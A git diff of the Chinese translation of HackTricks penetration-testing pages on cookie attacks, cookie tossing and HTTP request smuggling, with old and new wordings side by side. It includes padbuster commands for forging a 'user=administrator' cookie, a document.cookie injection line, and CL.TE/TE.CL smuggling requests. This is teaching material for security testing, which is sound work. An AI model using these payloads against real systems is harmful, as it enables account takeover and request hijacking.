这种漏洞在依赖基于 cookie 的 CSRF 保护的 web 应用程序中尤其危险,因为它允许攻击者注入伪造的 CSRF-token cookies可能绕过安全措施。这个问题因 Python 对重复 cookie 名称的处理而加剧,最后一个出现的名称会覆盖之前的名称。它还引发了对不安全上下文中 `__Secure-``__Host-` cookies 的担忧,并可能导致在将 cookies 传递给易受伪造影响的后端服务器时绕过授权
### 额外易受攻击的Cookie检查
### Extra Vulnerable Cookies Checks
#### **基本检查**
#### **Basic checks**
- **cookie** 每次**登录**时都是**相同**的。
- 注销然后尝试使用相同的cookie。
- 尝试使用两台设备或浏览器使用相同的cookie登录同一帐户。
- 检查cookie中是否有任何信息并尝试修改它。
- 尝试创建几个几乎相同用户名的帐户,并检查是否存在相似之处。
- 检查是否存在“**记住我**”选项看看它是如何工作的。如果存在且可能存在漏洞始终只使用“记住我”cookie而不使用其他cookie。
- 检查在更改密码后之前的cookie是否仍然有效。
* **cookie** 每次 **登录** 时都是 **相同** 的。
* 登出并尝试使用相同的 cookie。
* 尝试用 2 个设备(或浏览器)使用相同的 cookie 登录同一账户。
* 检查 cookie 中是否有任何信息并尝试修改它。
* 尝试创建多个几乎相同用户名的账户,并检查是否可以看到相似之处。
* 检查是否存在 "**记住我**" 选项以查看其工作原理。如果存在并可能存在漏洞,始终使用 "**记住我**" 的 cookie而不使用其他 cookie。
* 检查即使在更改密码后,之前的 cookie 是否仍然有效。
#### **高级cookie攻击**
#### **Advanced cookies attacks**
如果在登录时cookie保持不变或几乎不变这可能意味着cookie与您帐户的某个字段相关可能是用户名。然后您可以:
如果在登录时 cookie 保持相同(或几乎相同),这可能意味着 cookie 与您账户的某个字段(可能是用户名)相关。然后您可以:
- 尝试创建许多非常**相似**的用户名帐户,并尝试**猜测**算法是如何工作的
- 尝试**暴力破解用户名**。如果cookie仅保存为您用户名的身份验证方法则可以创建一个用户名为“**Bmin**”的帐户,并**暴力破解**您cookie的每一位因为您将尝试的cookie之一将属于“**admin**”
- 尝试**填充****Oracle**您可以解密cookie的内容。使用**padbuster**
* 尝试创建许多用户名非常 **相似****账户**,并尝试 **猜测** 算法的工作原理
* 尝试 **暴力破解用户名**。如果 cookie 仅作为您用户名的身份验证方法保存,那么您可以创建一个用户名为 "**Bmin**" 的账户,并 **暴力破解** 您的 cookie 的每一个 **位**,因为您尝试的其中一个 cookie 将属于 "**admin**"
* 尝试 **Padding** **Oracle**(您可以解密 cookie 的内容)。使用 **padbuster**
**填充Oracle - Padbuster示例**
**Padding Oracle - Padbuster examples**
```bash
padbuster <URL/path/when/successfully/login/with/cookie> <COOKIE> <PAD[8-16]>
# When cookies and regular Base64
@ -227,40 +232,40 @@ padbuster http://web.com/index.php u7bvLewln6PJPSAbMb5pFfnCHSEd6olf 8 -cookies a
padBuster http://web.com/home.jsp?UID=7B216A634951170FF851D6CC68FC9537858795A28ED4AAC6
7B216A634951170FF851D6CC68FC9537858795A28ED4AAC6 8 -encoding 2
```
Padbuster 将尝试多次,并询问您哪个条件是错误条件(即无效条件)。
Padbuster 将进行多次尝试,并询问您哪个条件是错误条件(即无效条件)。
然后它将开始解密 cookie可能需要几分钟
如果攻击成功执行,那么您可以尝试加密您选择的字符串。例如,如果您想要**加密** **user=administrator**
如果攻击成功执行,则您可以尝试加密您选择的字符串。例如,如果您想要 **encrypt** **user=administrator**
```
padbuster http://web.com/index.php 1dMjA5hfXh0jenxJQ0iW6QXKkzAGIWsiDAKV3UwJPT2lBP+zAD0D0w== 8 -cookies thecookie=1dMjA5hfXh0jenxJQ0iW6QXKkzAGIWsiDAKV3UwJPT2lBP+zAD0D0w== -plaintext user=administrator
```
这个执行将给出正确加密和编码的 cookie其中包含字符串 **user=administrator**
这个执行将正确加密和编码包含字符串 **user=administrator** 的 cookie
**CBC-MAC**
也许一个 cookie 可能会有一些值,并且可以使用 CBC 进行签名。然后,值的完整性是使用相同值创建的签名。由于建议使用一个空向量作为 IV这种完整性检查可能存在漏洞
也许一个 cookie 可以有一些值,并且可以使用 CBC 签名。然后,值的完整性是使用相同值的 CBC 创建的签名。由于建议使用空向量作为 IV这种完整性检查可能会受到攻击
**攻击**
1. 获取用户名 **administ** 的签名 = **t**
2. 获取用户名 **rator\x00\x00\x00 XOR t** 的签名 = **t'**
3. 在 cookie 中设置值 **administrator+t'****t'** 将是 **(rator\x00\x00\x00 XOR t) XOR t** = **rator\x00\x00\x00** 的有效签名
3. 在 cookie 中设置值 **administrator+t'** (**t'** 将是 **(rator\x00\x00\x00 XOR t) XOR t** = **rator\x00\x00\x00** 的有效签名)
**ECB**
如果使用 ECB 加密 cookie可能会存在漏洞。\
登录时,收到的 cookie 必须始终相同。
如果 cookie 使用 ECB 加密,则可能会受到攻击。\
登录时,收到的 cookie 必须始终相同。
**如何检测和攻击:**
**如何检测和攻击**
创建个几乎相同数据的用户(用户名、密码、电子邮件等),并尝试发现给定 cookie 中的某种模式
创建 2 个几乎相同数据的用户(用户名、密码、电子邮件等),并尝试发现给定 cookie 中的某些模式。
创建一个名为例如 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" 的用户,并检查 cookie 中是否有任何模式(因为 ECB 使用相同的密钥加密每个块,如果用户名被加密,则相同的加密字节可能会出现)。
创建一个名为 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" 的用户,并检查 cookie 中是否有任何模式(由于 ECB 使用相同的密钥加密每个块,如果用户名被加密,则相同的加密字节可能会出现)。
应该有一个模式(与使用块的大小相同)。因此,知道一堆 "a" 是如何加密的,您可以创建一个用户名:"a"\*(块的大小)+"admin"。然后,您可以从 cookie 中删除一个块的加密模式 "a",然后您将得到用户名为 "admin" 的 cookie。
应该有一个模式(与使用块的大小相同)。因此,知道一堆 "a" 是如何加密的,你可以创建一个用户名:"a"*(块的大小)+"admin"。然后,你可以从 cookie 中删除一个块的 "a" 的加密模式。你将拥有用户名 "admin" 的 cookie。
## 参考资料
## 参考
* [https://blog.ankursundara.com/cookie-bugs/](https://blog.ankursundara.com/cookie-bugs/)
* [https://www.linkedin.com/posts/rickey-martin-24533653\_100daysofhacking-penetrationtester-ethicalhacking-activity-7016286424526180352-bwDd](https://www.linkedin.com/posts/rickey-martin-24533653\_100daysofhacking-penetrationtester-ethicalhacking-activity-7016286424526180352-bwDd)
@ -271,16 +276,17 @@ padbuster http://web.com/index.php 1dMjA5hfXh0jenxJQ0iW6QXKkzAGIWsiDAKV3UwJPT2lB
{% embed url="https://discord.gg/tryhardsecurity" %}
{% hint style="success" %}
学习和实践 AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想在 HackTricks 中看到您的 **公司广告****下载 PDF 版本的 HackTricks**,请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 发现 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFT**](https://opensea.io/collection/the-peass-family) 收藏品
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,93 +1,95 @@
# Cookie Tossing
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **在Twitter上** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
### 描述
如果攻击者能够**控制公司的子域或域**或者在子域中找到XSS漏洞,他将能够执行此攻击。
如果攻击者能够**控制一个子域名或公司的域名,或者在子域名中发现 XSS**,他将能够执行此攻击。
正如在Cookies Hacking部分中所指出的当**将cookie设置为一个域指定它它将在该域和子域中使用**。
正如在 Cookies Hacking 部分所指出的,当**cookie 被设置到一个域(指定它)时,它将在该域及其子域中使用。**
{% hint style="danger" %}
因此,**攻击者将能够设置一个特定的cookie到域和子域中类似于** `document.cookie="session=1234; Path=/app/login; domain=.example.com"`
因此,**攻击者将能够将特定 cookie 设置到域和子域,执行类似** `document.cookie="session=1234; Path=/app/login; domain=.example.com"`
{% endhint %}
这可能很危险,因为攻击者可能会
这可能是危险的,因为攻击者可能能够
* **将受害者的cookie固定到攻击者的帐户**,因此如果用户没有注意到,**他将在攻击者的帐户中执行操作**,攻击者可能会获取一些有趣的信息(检查用户在平台上的搜索历史记录,受害者可能在帐户中设置他的信用卡...
* 如果**登录后cookie不会更改**,攻击者可能只需**固定一个cookie会话固定**,等待受害者登录,然后**使用该cookie以受害者身份登录**。
* 有时,即使会话cookie更改攻击者也可以使用先前的cookie然后还会收到新的cookie。
* 如果**cookie设置了一些初始值**例如在flask中**cookie**可能会在会话中**设置**CSRF令牌而此值在受害者登录后将保持不变**攻击者可以设置这个已知值,然后滥用它**在这种情况下攻击者可以让用户执行CSRF请求因为他知道CSRF令牌)。
* 就像设置值一样,攻击者还可以获取服务器生成的未经身份验证的cookie从中获取CSRF令牌并使用它。
* **将受害者的 cookie 固定到攻击者的账户**,因此如果用户没有注意,**他将在攻击者的账户中执行操作**,攻击者可能获得一些有趣的信息(查看用户在平台上的搜索历史,受害者可能在账户中设置他的信用卡...
* 如果**cookie 在登录后没有改变**,攻击者可能只需**固定一个 cookie会话固定**,等待受害者登录,然后**使用该 cookie 以受害者身份登录**。
* 有时,即使会话 cookie 发生变化,攻击者也会使用之前的 cookie并且他也会收到新的 cookie。
* 如果**cookie 设置了一些初始值**(例如在 flask 中,**cookie** 可能**设置**会话的 **CSRF token**,并且该值将在受害者登录后保持),**攻击者可能设置这个已知值,然后滥用它**(在这种情况下,攻击者可能会让用户执行 CSRF 请求,因为他知道 CSRF token)。
* 就像设置值一样,攻击者还可以获取服务器生成的未认证 cookie从中获取 CSRF token 并使用它。
### Cookie顺序
### Cookie 顺序
当浏览器接收到两个具有相同名称的cookie **部分影响相同范围**(域、子域和路径)时,**浏览器将在请求时发送两个cookie的值**,只要两者对请求都有效
当浏览器接收到两个具有相同名称的 cookie **部分影响相同范围**(域、子域和路径)时,**浏览器将在请求有效时发送两个 cookie 的值**。
取决于谁具有**最具体路径**或哪个是**最旧的**,浏览器将**首先设置cookie的值**,然后设置另一个值,如:`Cookie: iduser=MoreSpecificAndOldestCookie; iduser=LessSpecific;`
根据谁具有**最具体的路径**或哪个是**最旧的**,浏览器将**首先设置 cookie 的值**,然后设置另一个值,如:`Cookie: iduser=MoreSpecificAndOldestCookie; iduser=LessSpecific;`
大多数**网站将仅使用第一个值**。因此如果攻击者想要设置一个cookie最好在另一个cookie设置之前设置它或者使用更具体的路径设置它
大多数**网站将只使用第一个值**。因此,如果攻击者想要设置一个 cookie最好在设置另一个之前设置它或者设置一个更具体的路径
{% hint style="warning" %}
此外,**在更具体的路径中设置cookie的能力**非常有趣,因为您将能够使**受害者使用他的cookie除了在恶意cookie设置将在之前发送的特定路径中之外**。
此外,**在更具体的路径中设置 cookie 的能力**非常有趣,因为您将能够让**受害者在他的 cookie 中工作,除了恶意 cookie 设置将被发送之前的特定路径。**
{% endhint %}
### 护绕过
### 护绕过
这种攻击的可能保护措施**Web服务器不接受具有相同名称但两个不同值的两个cookie的请求**。
对这种攻击的可能保护是**Web 服务器不接受具有相同名称但两个不同值的两个 cookie 的请求**。
为了绕过攻击者在受害者已经获得cookie后设置cookie的情况攻击者可以引起**cookie溢出**,然后,一旦**合法cookie被删除设置恶意cookie**。
为了绕过攻击者在受害者已经获得 cookie 后设置 cookie 的场景,攻击者可以造成**cookie 溢出**,然后,一旦**合法 cookie 被删除,设置恶意 cookie**。
{% content-ref url="cookie-jar-overflow.md" %}
[cookie-jar-overflow.md](cookie-jar-overflow.md)
{% endcontent-ref %}
另一个有用的**绕过**方法可能是**对cookie名称进行URL编码**因为一些保护措施会检查请求中具有相同名称的2个cookie然后服务器将解码cookie的名称。
另一个有用的**绕过**可能是**对 cookie 名称进行 URL 编码**,因为一些保护措施检查请求中是否有两个具有相同名称的 cookie然后服务器将解码 cookie 的名称。
### Cookie炸弹
### Cookie 炸弹
Cookie Tossing攻击也可以用于执行**Cookie炸弹**攻击:
Cookie Tossing 攻击也可以用于执行**Cookie 炸弹**攻击:
{% content-ref url="cookie-bomb.md" %}
[cookie-bomb.md](cookie-bomb.md)
{% endcontent-ref %}
### 防御措施
### 防御
#### **在cookie名称中使用前缀`__Host`**
#### **在 cookie 名称中使用前缀 `__Host`**
* 如果cookie名称具有此前缀**只有在标记为安全从安全来源发送不包括Domain属性并且Path属性设置为/**的情况下,它**才会被接受**在Set-Cookie指令中
* **这可以防止子域强制将cookie发送到顶级域因为这些cookie可以被视为“锁定域”**
* 如果 cookie 名称具有此前缀,**只有在标记为安全、从安全来源发送、不包括域属性并且路径属性设置为 / 时,才会在 Set-Cookie 指令中被接受**
* **这防止子域强制 cookie 到顶级域,因为这些 cookie 可以被视为“域锁定”**
### 参考资料
### 参考
* [**@blueminimal**](https://twitter.com/blueminimal)
* [**https://speakerdeck.com/filedescriptor/the-cookie-monster-in-your-browsers**](https://speakerdeck.com/filedescriptor/the-cookie-monster-in-your-browsers)
* [**https://github.blog/2013-04-09-yummy-cookies-across-domains/**](https://github.blog/2013-04-09-yummy-cookies-across-domains/)
* [**Cookie Crumbles: Unveiling Web Session Integrity Vulnerabilities**](https://www.youtube.com/watch?v=F\_wAzF4a7Xg)
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **在Twitter上** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,59 +1,60 @@
# HTTP 请求串行攻击 / HTTP Desync 攻击
# HTTP Request Smuggling / HTTP Desync Attack
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注**我们。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
## 什么是
**前端代理**和**后端**服务器之间发生**不同步**时,会出现此漏洞,使得**攻击者**能够发送一个 HTTP **请求**,该请求将被**前端代理**(负载均衡/反向代理)解释为**单个请求**,而被**后端**服务器解释为**2个请求**。\
这使得用户能够在其之后到达后端服务器的**下一个请求**中**修改请求**
**前端代理****后端** 服务器之间发生 **不同步** 时,允许 **攻击者** 发送一个 HTTP **请求**,该请求将被 **前端** 代理(负载均衡/反向代理)解释为 **单个请求**,而被 **后端** 服务器解释为 **两个请求**。\
这使得用户能够 **修改到达后端服务器的下一个请求**
### 理论
[**RFC 规范2161**](https://tools.ietf.org/html/rfc2616)
[**RFC 规范 (2161)**](https://tools.ietf.org/html/rfc2616)
> 如果接收到的消息同时具有传输编码头字段和内容长度头字段,则必须忽略后者
> 如果收到的消息同时包含 Transfer-Encoding 头字段和 Content-Length 头字段,则后者必须被忽略
**Content-Length**
> Content-Length 实体头指示发送给接收方的实体主体的字节数
> Content-Length 实体头指示发送给接收者的实体主体的大小(以字节为单位)
**Transfer-Encoding: chunked**
> Transfer-Encoding 头指定用于安全传输有效载主体的编码形式。\
> Chunked 意味着大数据以一系列块的形式发送
> Transfer-Encoding 头指定用于安全传输有效载主体的编码形式。\
> Chunked 意味着大数据以一系列块的形式发送
### 现实情况
### 现实
**前端**(负载均衡 / 反向代理)处理 _**content-length**__**transfer-encoding**_ 头,而**后端**服务器处理另一个头,导致这两个系统之间的**不同步**。\
这可能非常危险,因为**攻击者将能够向反向代理发送一个请求**,该请求将被**后端**服务器解释为**2个不同的请求**。这种技术的危险在于**后端**服务器将会将**注入的第二个请求**解释为来自**下一个客户端**,而该客户端的**真实请求**将成为**注入请求**的一部分
**前端**(负载均衡/反向代理)**处理** _**content-length**__**transfer-encoding**_ 头,而 **后端** 服务器 **处理另一个**,导致两个系统之间的 **不同步**。\
这可能非常关键,因为 **攻击者将能够向反向代理发送一个请求**,该请求将被 **后端** 服务器 **解释为两个不同的请求**。这种技术的 **危险** 在于 **后端** 服务器 **将解释** **注入的第二个请求**,就好像它 **来自下一个客户端**,而该客户端的 **真实请求** 将是 **注入请求****一部分**
### 特殊情况
### 特
请记住,在 HTTP 中**一个换行符由 2 个字节组成**
请记住,在 HTTP 中 **一个新行字符由 2 个字节组成:**
* **Content-Length**:此头使用**十进制数**来指示请求主体的**字节数**。预期请求主体在最后一个字符结束,**请求的末尾不需要换行符**。
* **Transfer-Encoding:** 此头在**主体**中使用**十六进制数**来指示**下一个块**的**字节数**。**块**必须以**换行符**结尾,但是**长度指示符不计算**这个换行符。此传输方法必须以**大小为 0 的块后跟 2 个换行符**结束:`0`
* **Connection**:根据我的经验,建议在请求串行的第一个请求中使用**`Connection: keep-alive`**。
* **Content-Length**:此头使用 **十进制数字** 指示请求 **主体****字节数**。主体预计在最后一个字符结束,**请求末尾不需要新行**。
* **Transfer-Encoding:** 此头在 **主体** 中使用 **十六进制数字** 指示 **下一个块****字节数**。**块** 必须以 **新行** 结束,但此新行 **不计入** 长度指示符。此传输方法必须以 **大小为 0 的块后跟 2 个新行** 结束: `0`
* **Connection**:根据我的经验,建议在请求 Smuggling 的第一个请求中使用 **`Connection: keep-alive`**。
## 基本示例
{% hint style="success" %}
尝试使用 Burp Suite 利用此漏洞时,**在重复器中禁用 `Update Content-Length``Normalize HTTP/1 line endings`**,因为一些小工具会滥用换行符、回车和格式不正确的 content-length
尝试使用 Burp Suite 利用此漏洞时,**禁用 `Update Content-Length``Normalize HTTP/1 line endings`**,因为某些工具滥用新行、回车和格式错误的内容长度
{% endhint %}
HTTP 请求串行攻击是通过发送模棱两可的请求来制造的,利用前端和后端服务器解释 `Content-Length`CL`Transfer-Encoding`TE头的差异。这些攻击可以以不同形式出现主要是**CL.TE**、**TE.CL** 和 **TE.TE**。每种类型代表前端和后端服务器如何优先处理这些头的独特组合。漏洞源于服务器以不同方式处理相同请求,导致意外且可能恶意的结果。
HTTP 请求走私攻击是通过发送模棱两可的请求来构造的,这些请求利用了前端和后端服务器在解释 `Content-Length` (CL) 和 `Transfer-Encoding` (TE) 头时的差异。这些攻击可以以不同形式表现,主要为 **CL.TE**、**TE.CL** 和 **TE.TE**。每种类型代表前端和后端服务器如何优先处理这些头的独特组合。漏洞源于服务器以不同方式处理相同请求,导致意外和潜在的恶意结果。
### 漏洞类型的基本示例
@ -61,12 +62,12 @@ HTTP 请求串行攻击是通过发送模棱两可的请求来制造的,利用
#### CL.TE 漏洞(前端使用 Content-Length后端使用 Transfer-Encoding
* **前端CL** 根据 `Content-Length` 头处理请求。
* **后端TE** 根据 `Transfer-Encoding` 头处理请求。
* **前端 (CL)** 根据 `Content-Length` 头处理请求。
* **后端 (TE)** 根据 `Transfer-Encoding` 头处理请求。
* **攻击场景:**
* 攻击者发送一个请求,其中 `Content-Length` 头的值与实际内容长度不匹配。
* 前端服务器根据 `Content-Length` 值将整个请求转发给后端。
* 后端服务器由于 `Transfer-Encoding: chunked`而将请求处理为分块,将剩余数据解释为单独的、随后的请求。
* 后端服务器由于 `Transfer-Encoding: chunked`将请求处理为分块,解释剩余数据为一个单独的后续请求。
* **示例:**
```
@ -84,12 +85,12 @@ Foo: x
#### TE.CL 漏洞(前端使用 Transfer-Encoding后端使用 Content-Length
* **前端TE** 根据 `Transfer-Encoding` 头处理请求。
* **后端CL** 根据 `Content-Length` 头处理请求。
* **前端 (TE)** 根据 `Transfer-Encoding` 头处理请求。
* **后端 (CL)** 根据 `Content-Length` 头处理请求。
* **攻击场景:**
* 攻击者发送一个分块请求,其中块大小(`7b`)和实际内容长度(`Content-Length: 4`)不对齐
* 攻击者发送一个分块请求,其中块大小(`7b`)和实际内容长度(`Content-Length: 4`)不一致
* 前端服务器遵循 `Transfer-Encoding`,将整个请求转发给后端。
* 后端服务器遵循 `Content-Length`,仅处理请求的初始部分(`7b` 字节),将其余部分作为意外的随后请求的一部分。
* 后端服务器尊重 `Content-Length`,仅处理请求的初始部分(`7b` 字节),将其余部分视为意外的后续请求的一部分。
* **示例:**
```
@ -109,13 +110,14 @@ x=
0
```
#### TE.TE漏洞前端和后端都使用的传输编码带有混淆
* **服务器:** 两者都支持`Transfer-Encoding`,但可以通过混淆来欺骗其中一个。
#### TE.TE 漏洞(两者都使用 Transfer-Encoding带混淆
* **服务器:** 两者都支持 `Transfer-Encoding`,但可以通过混淆来欺骗其中一个忽略它。
* **攻击场景:**
* 攻击者发送带有混淆的`Transfer-Encoding`头的请求。
* 取决于哪个服务器前端或后端无法识别混淆可能会利用CL.TE或TE.CL漏洞。
* 请求的未处理部分,由其中一个服务器看到,将成为后续请求的一部分,导致走私。
* 攻击者发送一个带有混淆 `Transfer-Encoding` 头的请求。
* 根据哪个服务器(前端或后端)未能识别混淆,可能会利用 CL.TE 或 TE.CL 漏洞。
* 请求中未处理的部分,作为其中一个服务器所见,成为后续请求的一部分,导致走私。
* **示例:**
```
@ -135,10 +137,10 @@ Transfer-Encoding
: chunked
```
#### **CL.CL场景(前端和后端都使用的内容长度**
#### **CL.CL 场景(前端和后端都使用 Content-Length**
* 两个服务器仅基于`Content-Length`头处理请求。
* 这种情况通常不会导致走私,因为两个服务器在解释请求长度方面是一致的。
* 两个服务器仅根据 `Content-Length` 头处理请求。
* 此场景通常不会导致走私,因为两个服务器在解释请求长度时是一致的。
* **示例:**
```
@ -147,13 +149,13 @@ Host: vulnerable-website.com
Content-Length: 16
Connection: keep-alive
正常请求
Normal Request
```
#### **CL != 0场景**
#### **CL != 0 场景:**
* 指的是`Content-Length`头存在且值不为零的情况,表明请求体具有内容。
* 在理解和构走私攻击时至关重要,因为它影响服务器如何确定请求结束。
* 指的是 `Content-Length` 头存在且值不为零的场景,表明请求主体有内容。
* 在理解和构走私攻击时至关重要,因为它影响服务器确定请求结束的方式
* **示例:**
```
@ -162,30 +164,36 @@ Host: vulnerable-website.com
Content-Length: 16
Connection: keep-alive
非空请求体
Non-Empty Body
```
#### 破坏Web服务器
#### 破坏 Web 服务器
这种技术在**读取初始HTTP数据时可能破坏Web服务器**,但**不关闭连接**的情况下也很有用。这样HTTP请求的**主体**将被视为**下一个HTTP请求**
此技术在可以 **在读取初始 HTTP 数据时破坏 Web 服务器****不关闭连接** 的场景中也很有用。这样HTTP 请求的 **主体** 将被视为 **下一个 HTTP 请求**
例如,正如在[**这篇文章**](https://mizu.re/post/twisty-python)中所解释的在Werkzeug中发送一些**Unicode**字符可能导致服务器**崩溃**。但是,如果使用带有头部**`Connection: keep-alive`**创建HTTP连接则不会读取请求的主体,连接仍将保持打开状态,因此请求的**主体**将被视为**下一个HTTP请求**。
例如,如 [**这篇文章**](https://mizu.re/post/twisty-python) 中所述,在 Werkzeug 中可以发送一些 **Unicode** 字符,这将使服务器 **崩溃**。然而,如果 HTTP 连接是使用 **`Connection: keep-alive`** 头创建的,则请求的主体不会被读取,连接仍将保持打开状态,因此请求的 **主体** 将被视为 **下一个 HTTP 请求**
#### 通过逐跳头强制
